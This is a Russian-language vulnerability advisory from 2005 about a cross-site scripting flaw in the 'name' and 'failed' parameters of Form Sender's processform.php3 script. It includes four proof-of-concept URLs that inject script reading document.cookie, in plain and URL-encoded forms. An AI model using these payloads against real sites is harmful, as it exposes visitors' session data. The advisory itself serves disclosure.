Межсайтовый скриптинг в Form Sender

Дата публикации:
21.07.2005
Всего просмотров:
880
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Form Sender

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах 'name' и 'failed' сценария 'processform.php3'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/[path]/processform.php3?name=
< script>alert(document.coo kie)</script>

http://[target]/[path]/processform.php3?name=
%3Cscript%3Ealert%28document.cookie%29
%3C%2Fscript%3E

http://[target]/[path]/processform.php3?failed=
< script> alert(document.cookie)</script>

http://[target]/[path]/processform.php3?failed=
%3Cscript%3Ealert%28document.cookie%29
%3C%2Fscript%3E

URL производителя: www.creativephp.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Form Sender xss poc exploit

или введите имя

CAPTCHA